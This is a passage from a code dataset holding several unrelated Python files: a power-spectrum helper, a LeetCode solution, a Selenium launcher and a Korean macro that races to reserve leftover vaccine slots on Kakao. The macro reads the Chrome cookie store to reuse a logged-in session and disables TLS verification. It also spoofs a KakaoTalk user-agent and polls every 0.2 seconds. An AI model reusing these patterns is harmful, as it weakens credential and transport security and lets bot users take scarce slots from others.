Hertz.\n :param overlap_frac: (float) the fraction the FFT windows should overlap.\n :param min_nfft: (int) the smallest value of nfft to be used.\n :return nfft: (int) the number of FFT points.\n :return noverlap: (int) the number of overlapping FFT points.\n \"\"\"\n nfft = next_power_of_two(samplerate / freq_resolution)\n if nfft < min_nfft:\n nfft = min_nfft\n noverlap = int(nfft * overlap_frac)\n return nfft, noverlap\n\n\ndef psd(data, samplerate, fresolution, min_nfft=16, detrend=mlab.detrend_none,\n window=mlab.window_hanning, overlap_frac=0.5, pad_to=None,\n sides='default', scale_by_freq=None):\n \"\"\"Power spectrum density of a given frequency resolution.\n\n From the requested frequency resolution and the samplerate nfft is computed.\n \n :param data: (1-D array) data array you want to calculate a psd of.\n :param samplerate: (float) sampling rate of the data in Hertz.\n :param fresolution: (float) frequency resolution of the psd in Hertz.\n :param overlap_frac: (float) fraction of overlap for the fft windows.\n See numpy.psd for the remaining parameter.\n\n :return: (2-D array) power and frequency.\n \"\"\"\n\n nfft, noverlap = nfft_noverlap(fresolution, samplerate, overlap_frac, min_nfft=min_nfft)\n power, freqs = mlab.psd(data, NFFT=nfft, noverlap=noverlap, Fs=samplerate, detrend=detrend, window=window,\n pad_to=pad_to, sides=sides, scale_by_freq=scale_by_freq)\n return np.asarray([np.squeeze(power), freqs]) # squeeze is necessary when nfft is to large with respect to the data\n\n\ndef decibel(power, ref_power=1.0, min_power=1e-20):\n \"\"\"\n Transforms power to decibel relative to ref_power.\n\n decibel_psd = 10 * log10(power/ref_power)\n\n Parameters\n ----------\n power: array\n the power values of the power spectrum or spectrogram.\n ref_power: float\n the reference power for computing decibel. If set to None the maximum power is used.\n min_power: float\n power values smaller than min_power are set to np.nan.\n\n Returns\n -------\n decibel_psd: array\n the power values in decibel\n \"\"\"\n if ref_power is None:\n ref_power = np.max(power)\n decibel_psd = power.copy()\n decibel_psd[power < min_power] = np.nan\n decibel_psd[power >= min_power] = 10.0 * np.log10(decibel_psd[power >= min_power]/ref_power)\n return decibel_psd\n\n\ndef plot_decibel_psd(ax, freqs, power, ref_power=1.0, min_power=1e-20, max_freq=2000.0, **kwargs):\n \"\"\"\n Plot the powerspectum in decibel relative to ref_power.\n\n Parameters\n ----------\n ax:\n axis for plot\n freqs: 1-D array\n frequency array of a psd.\n power: 1-D array\n power array of a psd.\n ref_power: float\n the reference power for computing decibel. If set to None the maximum power is used.\n min_power: float\n power values smaller than min_power are set to np.nan.\n max_freq: float\n limits of frequency axis are set to (0, max_freq) if max_freq is greater than zero\n kwargs:\n plot parameter that are passed on to the plot() function.\n \"\"\"\n \n decibel_psd = decibel(power, ref_power=ref_power, min_power=min_power)\n ax.plot(freqs, decibel_psd, **kwargs)\n ax.set_xlabel('Frequency [Hz]')\n if max_freq > 0.0:\n ax.set_xlim(0, max_freq)\n else:\n max_freq = freqs[-1]\n pmin = np.nanmin(decibel_psd[freqs < max_freq])\n pmin = np.floor(pmin / 10.0) * 10.0\n pmax = np.nanmax(decibel_psd[freqs < max_freq])\n pmax = np.ceil(pmax / 10.0) * 10.0\n ax.set_ylim(pmin, pmax)\n ax.set_ylabel('Power [dB]')\n\n\ndef multi_resolution_psd(data, samplerate, fresolution=0.5,\n detrend=mlab.detrend_none, window=mlab.window_hanning,\n overlap=0.5, pad_to=None, sides='default',\n scale_by_freq=None, min_nfft=16):\n \"\"\"Compute powerspectrum with a given frequency resolution.\n\n Two other functions are called to first calculate the nfft value and second calculate the powerspectrum. The given\n frequencyresolution can be a float or a list/array of floats.\n\n (for information on further arguments see numpy.psd documentation)\n :param data: (1-D array) data array you want to calculate a psd of.\n :param samplerate: (float) sampling rate of the data in Hertz.\n :param fresolution: (float or 1-D array) frequency resolutions for one or multiple psds in Hertz.\n :param overlap: (float) fraction of overlap for the fft windows.\n :return multi_psd_data: (3-D or 2-D array) if the psd is calculated for one frequency resolution\n a 2-D array with the single power spectrum is returned (psd_data[power, freq]).\n If the psd is calculated for multiple frequency resolutions\n a list of 2-D array is returned (psd_data[frequency_resolution][power, freq]).\n \"\"\"\n return_list = True\n if not hasattr(fresolution, '__len__'):\n return_list = False\n fresolution = [fresolution]\n\n multi_psd_data = []\n for fres in fresolution:\n psd_data = psd(data, samplerate, fres, min_nfft, detrend, window, overlap, pad_to, sides, scale_by_freq)\n multi_psd_data.append(psd_data)\n\n if not return_list:\n multi_psd_data = multi_psd_data[0]\n\n return multi_psd_data\n\n\ndef spectrogram(data, samplerate, fresolution=0.5, detrend=mlab.detrend_none, window=mlab.window_hanning,\n overlap_frac=0.5, pad_to=None, sides='default', scale_by_freq=None, min_nfft=16):\n \"\"\"\n Spectrogram of a given frequency resolution.\n\n :param data: (array) data for the spectrogram.\n :param samplerate: (float) samplerate of data in Hertz.\n :param fresolution: (float) frequency resolution for the spectrogram.\n :param overlap_frac: (float) overlap of the nffts (0 = no overlap; 1 = total overlap).\n :return spectrum: (2d array) contains for every timestamp the power of the frequencies listed in the array \"freqs\".\n :return freqs: (array) frequencies of the spectrogram.\n :return time: (array) time of the nffts.\n \"\"\"\n\n nfft, noverlap = nfft_noverlap(fresolution, samplerate, overlap_frac, min_nfft=min_nfft)\n\n spectrum, freqs, time = mlab.specgram(data, NFFT=nfft, Fs=samplerate, detrend=detrend, window=window,\n noverlap=noverlap, pad_to=pad_to, sides=sides, scale_by_freq=scale_by_freq)\n return spectrum, freqs, time\n\n\nif __name__ == '__main__':\n try:\n import matplotlib.pyplot as plt\n except ImportError:\n pass\n\n print('Computes powerspectrum of a created signal of two wavefish (300 and 450 Hz)')\n print('')\n print('Usage:')\n print(' python powerspectrum.py')\n print('')\n\n fundamentals = [300, 450] # Hz\n samplerate = 100000.0 # Hz\n time = np.arange(0.0, 8.0, 1.0/samplerate)\n data = np.sin(2*np.pi*fundamentals[0]*time) + 0.5*np.sin(2*np.pi*fundamentals[1]*time)\n\n psd_data = multi_resolution_psd(data, samplerate, fresolution=[0.5, 1])\n\n fig, ax = plt.subplots()\n plot_decibel_psd(ax, psd_data[0][1], psd_data[0][0], lw=2)\n plot_decibel_psd(ax, psd_data[1][1], psd_data[1][0], lw=2)\n plt.show()\n","sub_path":"powerspectrum.py","file_name":"powerspectrum.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"365205572","text":"#\n# [347] Top K Frequent Elements\n#\n# https://leetcode.com/problems/top-k-frequent-elements/description/\n#\n# algorithms\n# Medium (49.74%)\n# Total Accepted: 105.6K\n# Total Submissions: 212.3K\n# Testcase Example: '[1,1,1,2,2,3]\\n2'\n#\n#\n# Given a non-empty array of integers, return the k most frequent elements.\n#\n# For example,\n# Given [1,1,1,2,2,3] and k = 2, return [1,2].\n#\n#\n# Note:\n#\n# You may assume k is always valid, 1 ≤ k ≤ number of unique elements.\n# Your algorithm's time complexity must be better than O(n log n), where n is\n# the array's size.\n#\n#\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n nums_with_count = collections.defaultdict(int)\n for i in nums:\n nums_with_count[i] += 1\n sorted_nums = sorted(nums_with_count, key=nums_with_count.get, reverse=True)\n return sorted_nums[:k]\n","sub_path":"347.top-k-frequent-elements.150596861.ac.py","file_name":"347.top-k-frequent-elements.150596861.ac.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"630833027","text":"#!/usr/bin/env python3.9 -m nuitka\n# -*- coding: utf-8 -*-\nimport browser_cookie3\nimport requests\nimport configparser\nimport json\nimport os\nimport sys\nimport time\nfrom playsound import playsound\nfrom datetime import datetime\nimport telepot\nimport unicodedata\nimport urllib3\nimport re\nimport platform\n\nsearch_time = 0.2 # 잔여백신을 해당 시간마다 한번씩 검색합니다. 단위: 초\nurllib3.disable_warnings()\n\n# 아래의 `load_cookie()` 에서 쿠키를 불러옴.\njar = None\n\n\n# 기존 입력 값 로딩\ndef load_config():\n config_parser = configparser.ConfigParser()\n if os.path.exists('config.ini'):\n try:\n config_parser.read('config.ini')\n\n while True:\n skip_input = str.lower(input(\"기존에 입력한 정보로 재검색하시겠습니까? Y/N : \"))\n if skip_input == \"y\":\n skip_input = True\n break\n elif skip_input == \"n\":\n skip_input = False\n break\n else:\n print(\"Y 또는 N을 입력해 주세요.\")\n\n if skip_input:\n # 설정 파일이 있으면 최근 로그인 정보 로딩\n configuration = config_parser['config']\n previous_used_type = configuration[\"VAC\"]\n previous_top_x = configuration[\"topX\"]\n previous_top_y = configuration[\"topY\"]\n previous_bottom_x = configuration[\"botX\"]\n previous_bottom_y = configuration[\"botY\"]\n return previous_used_type, previous_top_x, previous_top_y, previous_bottom_x, previous_bottom_y\n else:\n return None, None, None, None, None\n except ValueError:\n return None, None, None, None, None\n return None, None, None, None, None\n\n\n# cookie.ini 안의 [chrome][cookie_file] 에서 경로를 로드함.\ndef load_cookie_config():\n config_parser = configparser.ConfigParser(interpolation=None)\n if os.path.exists('cookie.ini'):\n try:\n config_parser.read('cookie.ini')\n cookie_file = config_parser['chrome']['cookie_file'].strip()\n\n indicator = cookie_file[0]\n if indicator == '~':\n cookie_path = os.path.expanduser(cookie_file)\n elif indicator in ('%', '$'):\n cookie_path = os.path.expandvars(cookie_file)\n else:\n cookie_path = cookie_file\n\n cookie_path = os.path.abspath(cookie_path)\n\n if os.path.exists(cookie_path):\n return cookie_path\n else:\n print(\"지정된 경로에 쿠키 파일이 존재하지 않습니다. 기본값으로 시도합니다.\")\n return None\n except Exception: # 정확한 오류를 몰라서 전부 Exception\n return None\n return None\n\n\n# cookie 경로가 입력되지 않았을시, 쿠키 파일이 Default 경로에 있는지 확인함\n# 경로가 입력되었거나, Default 경로의 쿠키가 존재해야 global jar 함수에 cookie를 로드함.\ndef load_cookie():\n global jar\n\n cookie_file = load_cookie_config()\n cookie_path = None\n\n os_type = platform.system()\n if os_type == \"Linux\":\n # browser_cookie3 also checks beta version of google chrome's cookie file.\n cookie_path = os.path.expanduser(\n \"~/.config/google-chrome/Default/Cookies\")\n if os.path.exists(cookie_path) is False:\n cookie_path = os.path.expanduser(\n \"~/.config/google-chrome-beta/Default/Cookies\")\n elif os_type == \"Darwin\":\n cookie_path = os.path.expanduser(\n \"~/Library/Application Support/Google/Chrome/Default/Cookies\")\n elif os_type == \"Windows\":\n cookie_path = os.path.expandvars(\n \"%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies\")\n else: # Jython?\n print(\"지원하지 않는 환경입니다.\")\n close()\n\n if cookie_file is None and os.path.exists(cookie_path) is False:\n print(\"기본 쿠키 파일 경로에 파일이 존재하지 않습니다. 아래 링크를 참조하여 쿠키 파일 경로를 지정해주세요.\\n\" +\n \"https://github.com/SJang1/korea-covid-19-remaining-vaccine-macro/discussions/403\")\n close()\n\n jar = browser_cookie3.chrome(\n cookie_file=cookie_file, domain_name=\".kakao.com\")\n\n\ndef check_user_info_loaded():\n user_info_api = 'https://vaccine.kakao.com/api/v1/user'\n user_info_response = requests.get(\n user_info_api, headers=Headers.headers_vacc, cookies=jar, verify=False)\n user_info_json = json.loads(user_info_response.text)\n if user_info_json.get('error'):\n print(\"사용자 정보를 불러오는데 실패하였습니다.\")\n print(\"Chrome 브라우저에서 카카오에 제대로 로그인되어있는지 확인해주세요.\")\n print(\"로그인이 되어 있는데도 안된다면, 카카오톡에 들어가서 잔여백신 알림 신청을 한번 해보세요. 정보제공 동의가 나온다면 동의 후 다시 시도해주세요.\")\n close()\n else:\n user_info = user_info_json.get(\"user\")\n for key in user_info:\n value = user_info[key]\n # print(key, value)\n if key != 'status':\n continue\n if key == 'status' and value == \"NORMAL\":\n print(\"사용자 정보를 불러오는데 성공했습니다.\")\n break\n elif key == 'status' and value == \"UNKNOWN\":\n print(\"상태를 알 수 없는 사용자입니다. 1339 또는 보건소에 문의해주세요.\")\n close()\n else:\n print(\"이미 접종이 완료되었거나 예약이 완료된 사용자입니다.\")\n close(success=None)\n\n\ndef fill_str_with_space(input_s, max_size=40, fill_char=\" \"):\n \"\"\"\n - 길이가 긴 문자는 2칸으로 체크하고, 짧으면 1칸으로 체크함.\n - 최대 길이(max_size)는 40이며, input_s의 실제 길이가 이보다 짧으면\n 남은 문자를 fill_char로 채운다.\n \"\"\"\n length = 0\n for c in input_s:\n if unicodedata.east_asian_width(c) in [\"F\", \"W\"]:\n length += 2\n else:\n length += 1\n return input_s + fill_char * (max_size - length)\n\n\ndef is_in_range(coord_type, coord, user_min_x=-180.0, user_max_y=90.0):\n korea_coordinate = { # Republic of Korea coordinate\n \"min_x\": 124.5,\n \"max_x\": 132.0,\n \"min_y\": 33.0,\n \"max_y\": 38.9\n }\n try:\n if coord_type == \"x\":\n return max(korea_coordinate[\"min_x\"], user_min_x) <= float(coord) <= korea_coordinate[\"max_x\"]\n elif coord_type == \"y\":\n return korea_coordinate[\"min_y\"] <= float(coord) <= min(korea_coordinate[\"max_y\"], user_max_y)\n else:\n return False\n except ValueError:\n # float 이외 값 입력 방지\n return False\n\n\n# pylint: disable=too-many-branches\ndef input_config():\n vaccine_candidates = [\n {\"name\": \"아무거나\", \"code\": \"ANY\"},\n {\"name\": \"화이자\", \"code\": \"VEN00013\"},\n {\"name\": \"모더나\", \"code\": \"VEN00014\"},\n {\"name\": \"아스트라제네카\", \"code\": \"VEN00015\"},\n {\"name\": \"얀센\", \"code\": \"VEN00016\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00017\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00018\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00019\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00020\"},\n ]\n vaccine_type = None\n while True:\n print(\"=== 백신 목록 ===\")\n for vaccine in vaccine_candidates:\n if vaccine[\"name\"] == \"(미사용)\":\n continue\n print(\n f\"{fill_str_with_space(vaccine['name'], 10)} : {vaccine['code']}\")\n\n vaccine_type = str.upper(input(\"예약시도할 백신 코드를 알려주세요: \").strip())\n if any(x[\"code\"] == vaccine_type for x in vaccine_candidates) or vaccine_type.startswith(\"FORCE:\"):\n if vaccine_type.startswith(\"FORCE:\"):\n vaccine_type = vaccine_type[6:]\n\n print(\"경고: 강제 코드 입력모드를 사용하셨습니다.\\n\" +\n \"이 모드는 새로운 백신이 예약된 코드로 **등록되지 않은 경우에만** 사용해야 합니다.\\n\" +\n \"입력하신 코드가 정상적으로 작동하는 백신 코드인지 필히 확인해주세요.\\n\" +\n f\"현재 코드: '{vaccine_type}'\\n\")\n\n if (len(vaccine_type) != 8 or not vaccine_type.startswith(\"VEN\") or not vaccine_type[3:].isdigit()):\n print(\"입력하신 코드가 현재 알려진 백신 코드 형식이랑 맞지 않습니다.\")\n proceed = str.lower(input(\"진행하시겠습니까? Y/N : \"))\n if proceed == \"y\":\n pass\n elif proceed == \"n\":\n continue\n else:\n print(\"Y 또는 N을 입력해 주세요.\")\n continue\n\n if next((x for x in vaccine_candidates if x[\"code\"] == vaccine_type), {\"name\": \"\"})[\"name\"] == \"(미사용)\":\n print(\"현재 프로그램 버전에서 백신 이름이 등록되지 않은, 추후를 위해 미리 넣어둔 백신 코드입니다.\\n\" +\n \"입력하신 코드가 정상적으로 작동하는 백신 코드인지 필히 확인해주세요.\\n\" +\n f\"현재 코드: '{vaccine_type}'\\n\")\n\n break\n else:\n print(\"백신 코드를 확인해주세요.\")\n\n print(\"사각형 모양으로 백신범위를 지정한 뒤, 해당 범위 안에 있는 백신을 조회해서 남은 백신이 있으면 Chrome 브라우저를 엽니다.\")\n top_x = None\n while top_x is None:\n top_x = input(\"사각형의 위쪽 좌측 x값을 넣어주세요. 127.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"x\", coord=top_x):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {top_x}\")\n top_x = None\n\n top_y = None\n while top_y is None:\n top_y = input(\"사각형의 위쪽 좌측 y값을 넣어주세요 37.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"y\", coord=top_y):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {top_y}\")\n top_y = None\n\n bottom_x = None\n while bottom_x is None:\n bottom_x = input(\"사각형의 아래쪽 우측 x값을 넣어주세요 127.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"x\", coord=bottom_x, user_min_x=float(top_x)):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {bottom_x}\")\n bottom_x = None\n\n bottom_y = None\n while bottom_y is None:\n bottom_y = input(\"사각형의 아래쪽 우측 y값을 넣어주세요 37.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"y\", coord=bottom_y, user_max_y=float(top_y)):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {bottom_y}\")\n bottom_y = None\n\n dump_config(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n return vaccine_type, top_x, top_y, bottom_x, bottom_y\n\n\ndef dump_config(vaccine_type, top_x, top_y, bottom_x, bottom_y):\n config_parser = configparser.ConfigParser()\n config_parser['config'] = {}\n conf = config_parser['config']\n conf['VAC'] = vaccine_type\n conf[\"topX\"] = top_x\n conf[\"topY\"] = top_y\n conf[\"botX\"] = bottom_x\n conf[\"botY\"] = bottom_y\n\n with open(\"config.ini\", \"w\") as config_file:\n config_parser.write(config_file)\n\n\ndef clear():\n if 'win' in sys.platform.lower():\n os.system('cls')\n else:\n os.system('clear')\n\n\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(\n os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)\n\n\ndef play_tada():\n playsound(resource_path('tada.mp3'))\n\n\ndef play_xylophon():\n playsound(resource_path('xylophon.mp3'))\n\n\ndef close(success=False):\n if success is True:\n play_tada()\n send_msg(\"잔여백신 예약 성공!! \\n 카카오톡지갑을 확인하세요.\")\n elif success is False:\n play_xylophon()\n send_msg(\"오류와 함께 잔여백신 예약 프로그램이 종료되었습니다.\")\n else:\n pass\n input(\"Press Enter to close...\")\n sys.exit()\n\n\ndef pretty_print(json_object):\n for org in json_object[\"organizations\"]:\n if org.get('status') == \"CLOSED\" or org.get('status') == \"EXHAUSTED\" or org.get('status') == \"UNAVAILABLE\":\n continue\n print(\n f\"잔여갯수: {org.get('leftCounts')}\\t상태: {org.get('status')}\\t기관명: {org.get('orgName')}\\t주소: {org.get('address')}\")\n\n\nclass Headers:\n headers_map = {\n \"Accept\": \"application/json, text/plain, */*\",\n \"Content-Type\": \"application/json;charset=utf-8\",\n \"Origin\": \"https://vaccine-map.kakao.com\",\n \"Accept-Language\": \"en-us\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 KAKAOTALK 9.4.2\",\n \"Referer\": \"https://vaccine-map.kakao.com/\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"Keep-Alive\",\n \"Keep-Alive\": \"timeout=5, max=1000\"\n }\n headers_vacc = {\n \"Accept\": \"application/json, text/plain, */*\",\n \"Content-Type\": \"application/json;charset=utf-8\",\n \"Origin\": \"https://vaccine.kakao.com\",\n \"Accept-Language\": \"en-us\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 KAKAOTALK 9.4.2\",\n \"Referer\": \"https://vaccine.kakao.com/\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"Keep-Alive\",\n \"Keep-Alive\": \"timeout=5, max=1000\"\n }\n\n\ndef try_reservation(organization_code, vaccine_type):\n reservation_url = 'https://vaccine.kakao.com/api/v1/reservation'\n data = {\"from\": \"Map\", \"vaccineCode\": vaccine_type,\n \"orgCode\": organization_code, \"distance\": None}\n response = requests.post(reservation_url, data=json.dumps(\n data), headers=Headers.headers_vacc, cookies=jar, verify=False)\n response_json = json.loads(response.text)\n for key in response_json:\n value = response_json[key]\n if key != 'code':\n continue\n if key == 'code' and value == \"NO_VACANCY\":\n print(\"잔여백신 접종 신청이 선착순 마감되었습니다.\")\n time.sleep(0.08)\n elif key == 'code' and value == \"TIMEOUT\":\n print(\"TIMEOUT, 예약을 재시도합니다.\")\n retry_reservation(organization_code, vaccine_type)\n elif key == 'code' and value == \"SUCCESS\":\n print(\"백신접종신청 성공!!!\")\n organization_code_success = response_json.get(\"organization\")\n print(\n f\"병원이름: {organization_code_success.get('orgName')}\\t\" +\n f\"전화번호: {organization_code_success.get('phoneNumber')}\\t\" +\n f\"주소: {organization_code_success.get('address')}\")\n close(success=True)\n else:\n print(\"ERROR. 아래 메시지를 보고, 예약이 신청된 병원 또는 1339에 예약이 되었는지 확인해보세요.\")\n print(response.text)\n close()\n\n\ndef retry_reservation(organization_code, vaccine_type):\n reservation_url = 'https://vaccine.kakao.com/api/v1/reservation/retry'\n\n data = {\"from\": \"Map\", \"vaccineCode\": vaccine_type,\n \"orgCode\": organization_code, \"distance\": None}\n response = requests.post(reservation_url, data=json.dumps(\n data), headers=Headers.headers_vacc, cookies=jar, verify=False)\n response_json = json.loads(response.text)\n for key in response_json:\n value = response_json[key]\n if key != 'code':\n continue\n if key == 'code' and value == \"NO_VACANCY\":\n print(\"잔여백신 접종 신청이 선착순 마감되었습니다.\")\n time.sleep(0.08)\n elif key == 'code' and value == \"SUCCESS\":\n print(\"백신접종신청 성공!!!\")\n organization_code_success = response_json.get(\"organization\")\n print(\n f\"병원이름: {organization_code_success.get('orgName')}\\t\" +\n f\"전화번호: {organization_code_success.get('phoneNumber')}\\t\" +\n f\"주소: {organization_code_success.get('address')}\")\n close(success=True)\n else:\n print(\"ERROR. 아래 메시지를 보고, 예약이 신청된 병원 또는 1339에 예약이 되었는지 확인해보세요.\")\n print(response.text)\n close()\n\n# ===================================== def ===================================== #\n\n\n# Get Cookie\n# driver = selenium.webdriver.Firefox()\n# driver.get(\"https://cs.kakao.com\")\n# pickle.dump( driver.get_cookies() , open(\"cookies.pkl\",\"wb\"))\n# cookies = pickle.load(open(\"cookies.pkl\", \"rb\"))\n# for cookie in cookies:\n# driver.add_cookie(cookie)\n# print(cookie)\n\n# pylint: disable=too-many-locals,too-many-statements,too-many-branches\ndef find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y):\n url = 'https://vaccine-map.kakao.com/api/v2/vaccine/left_count_by_coords'\n data = {\"bottomRight\": {\"x\": bottom_x, \"y\": bottom_y}, \"onlyLeft\": False, \"order\": \"latitude\",\n \"topLeft\": {\"x\": top_x, \"y\": top_y}}\n done = False\n found = None\n\n while not done:\n try:\n time.sleep(search_time)\n response = requests.post(url, data=json.dumps(\n data), headers=Headers.headers_map, verify=False, timeout=5)\n\n json_data = json.loads(response.text)\n\n pretty_print(json_data)\n print(datetime.now())\n\n for x in json_data.get(\"organizations\"):\n if x.get('status') == \"AVAILABLE\" or x.get('leftCounts') != 0:\n found = x\n done = True\n break\n\n except json.decoder.JSONDecodeError as decodeerror:\n print(\"JSONDecodeError : \", decodeerror)\n print(\"JSON string : \", response.text)\n close()\n\n except requests.exceptions.Timeout as timeouterror:\n print(\"Timeout Error : \", timeouterror)\n\n except requests.exceptions.SSLError as sslerror:\n print(\"SSL Error : \", sslerror)\n close()\n\n except requests.exceptions.ConnectionError as connectionerror:\n print(\"Connection Error : \", connectionerror)\n # See psf/requests#5430 to know why this is necessary.\n if not re.search('Read timed out', str(connectionerror), re.IGNORECASE):\n close()\n\n except requests.exceptions.HTTPError as httperror:\n print(\"Http Error : \", httperror)\n close()\n\n except requests.exceptions.RequestException as error:\n print(\"AnyException : \", error)\n close()\n\n if found is None:\n find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n print(f\"{found.get('orgName')} 에서 백신을 {found.get('leftCounts')}개 발견했습니다.\")\n print(f\"주소는 : {found.get('address')} 입니다.\")\n organization_code = found.get('orgCode')\n\n # 실제 백신 남은수량 확인\n vaccine_found_code = None\n\n if vaccine_type == \"ANY\": # ANY 백신 선택\n check_organization_url = f'https://vaccine.kakao.com/api/v2/org/org_code/{organization_code}'\n check_organization_response = requests.get(check_organization_url, headers=Headers.headers_vacc, cookies=jar,\n verify=False)\n check_organization_data = json.loads(\n check_organization_response.text).get(\"lefts\")\n for x in check_organization_data:\n if x.get('leftCount') != 0:\n found = x\n print(f\"{x.get('vaccineName')} 백신을 {x.get('leftCount')}개 발견했습니다.\")\n vaccine_found_code = x.get('vaccineCode')\n break\n else:\n print(f\"{x.get('vaccineName')} 백신이 없습니다.\")\n\n else:\n vaccine_found_code = vaccine_type\n print(f\"{vaccine_found_code} 으로 예약을 시도합니다.\")\n\n if vaccine_found_code and try_reservation(organization_code, vaccine_found_code):\n return None\n else:\n find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n\n\ndef main_function():\n load_cookie()\n check_user_info_loaded()\n previous_used_type, previous_top_x, previous_top_y, previous_bottom_x, previous_bottom_y = load_config()\n if previous_used_type is None:\n vaccine_type, top_x, top_y, bottom_x, bottom_y = input_config()\n else:\n vaccine_type, top_x, top_y, bottom_x, bottom_y = previous_used_type, previous_top_x, previous_top_y, previous_bottom_x, previous_bottom_y\n find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n close()\n\n\ndef send_msg(msg):\n config_parser = configparser.ConfigParser()\n if os.path.exists('telegram.txt'):\n try:\n config_parser.read('telegram.txt')\n print(\"Telegram으로 결과를 전송합니다.\")\n tgtoken = config_parser[\"telegram\"][\"token\"]\n tgid = config_parser[\"telegram\"][\"chatid\"]\n bot = telepot.Bot(tgtoken)\n bot.sendMessage(tgid, msg)\n return\n except Exception as e:\n print(\"Telegram Error : \", e)\n return\n\n\n# ===================================== run ===================================== #\nif __name__ == '__main__':\n main_function()\n","sub_path":"vaccine-run-kakao.py","file_name":"vaccine-run-kakao.py","file_ext":"py","file_size_in_byte":22077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"451738484","text":"import os\nimport time\nimport random\nimport logging\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\nclass WebService:\n\n\n def __init__(self):\n\n self._logger = logging.getLogger()\n self._driver = None\n\n def _open_firefox(self, startup_homepage='http://www.baidu.com'):\n\n try:\n firefox_profile = webdriver.FirefoxProfile()\n\n # 设置启动页\n firefox_profile.set_preference('browser.startup.homepage', startup_homepage)\n firefox_profile.set_preference('browser.startup.page', '1')\n # 设置不加载图片、通知窗口\n firefox_profile.set_preference('permissions.default.image', 2)\n firefox_profile.set_preference('permissions.default.desktop-notification', 2)\n firefox_profile.set_preference('plugin.state.flash', 0)\n # 设置本地不缓存\n firefox_profile.set_preference('browser.cache.check_doc_frequency', 3)\n firefox_profile.set_preference('browser.cache.disk.enable', False)\n firefox_profile.set_preference('browser.cache.memory.enable', False)\n firefox_options = webdriver.FirefoxOptions()\n # if proxy:\n # firefox_options.add_argument('--proxy-server={}'.format(proxy))\n\n logging.info(\"启动火狐浏览器\")\n if os.name == 'nt':\n\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Firefox(executable_path='./bin/geckodriver.exe',\n firefox_profile=firefox_profile)\n )\n else:\n firefox_options.add_argument('--headless')\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Firefox(executable_path='./bin/geckodriver',\n firefox_profile=firefox_profile,\n options=firefox_options,\n service_log_path=os.path.devnull)\n )\n self._driver.implicitly_wait(30)\n self._logger.info(u\"火狐浏览器启动完成!\")\n time.sleep(random.randint(8, 15))\n return True\n except Exception as msg:\n self._logger.exception(u\"火狐浏览器启动异常,异常信息:{}\".format(msg))\n return False\n\n def _open_chrome(self, startup_homepage='http://www.baidu.com'):\n\n try:\n # 设置无界面模式浏览器启动\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--ignore-certificate-errors') # 忽略https警告\n chrome_options.add_argument('--disable-cache')\n chrome_options.add_argument('--disable-gpu') # 禁用GPU加速\n chrome_options.add_argument('--start-maximized') # 浏览器最大化\n chrome_options.add_argument('--window-size=1280x1024') # 设置浏览器分辨率(窗口大小)\n chrome_options.add_argument('log-level=3') # info(default) = 0 warning = 1 LOG_ERROR = 2 LOG_FATAL = 3\n\n # chrome_options.add_argument('--user-agent=\"\"') # 设置请求头的User-Agent\n chrome_options.add_argument('--disable-infobars') # 禁用浏览器正在被自动化程序控制的提示\n chrome_options.add_argument('--incognito') # 隐身模式(无痕模式)\n # chrome_options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面\n # chrome_options.add_argument('--disable-popup-blocking') # 禁用javascript\n chrome_options.add_argument('--blink-settings=imagesEnabled=false') # 不加载图片, 提升速度\n chrome_options.add_argument('lang=en')\n # chrome_options.add_argument('--ignore-certificate-errors') # 禁用扩展插件并实现窗口最大化\n chrome_options.add_argument('-–disable-software-rasterizer')\n chrome_options.add_argument('--disable-extensions')\n\n # if proxy:\n #\n # chrome_options.add_argument('--proxy-server=http://{}'.format(proxy))\n logging.info(\"启动谷歌浏览器\")\n\n print(os.name)\n #windows\n if os.name == 'nt':\n\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Chrome(executable_path='/home/xuxin/drivers/bin/chromedriver',\n chrome_options=chrome_options)\n )\n\n else:\n\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n 